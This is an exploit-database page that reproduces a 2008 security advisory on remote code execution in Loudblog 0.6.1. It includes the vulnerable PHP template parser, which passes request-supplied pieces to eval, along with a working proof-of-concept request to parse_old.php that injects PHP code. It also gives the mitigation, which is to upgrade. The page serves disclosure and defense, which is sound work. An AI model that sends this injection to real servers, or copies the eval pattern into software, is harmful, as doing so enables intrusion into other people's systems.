header-logo
Suggest Exploit
vendor:
Loudblog
by:
Eugene Minaev
8.8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Loudblog
Affected Version From: 2000.6.1
Affected Version To: 2000.6.1
Patch Exists: YES
Related CWE: N/A
CPE: a:loudblog:loudblog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Loudblog >= 0.6.1 Remote Code Execution

A vulnerability in Loudblog version 0.6.1 and earlier allows remote attackers to execute arbitrary code via a crafted template parameter in a parse_old.php request.

Mitigation:

Upgrade to the latest version of Loudblog
Source

Exploit-DB raw data:

----[ Loudblog Remote Code Execution ... ITDefence.ru Antichat.ru ]

							Loudblog >= 0.6.1 Remote Code Execution
							Eugene Minaev underwater@itdefence.ru
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
			
		Template parser function
		
		<?php
		
		$parsedpage = fullparse(firstparse(hrefmagic($template)));

		//do we have php code within our template? switch between echo and eval!
		if ($php_use) {
		$templatepieces = explode ($phpseparator, $parsedpage);
		for ($i = 0; $i <= count($templatepieces); $i += 2) {
		echo $templatepieces[$i];
		if (isset($templatepieces[$i+1])) eval ($templatepieces[$i+1]);
		}
		//no php code, no eval!
		} else {
		echo $parsedpage;
		}  
		
		?>
		
		loudblog/inc/parse_old.php?template=@phpinfo();@&php_use=1&phpseparator=@&parsedpage=@phpinfo();@
		

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-06]

Navigation

Suggest Exploit

Services By CQR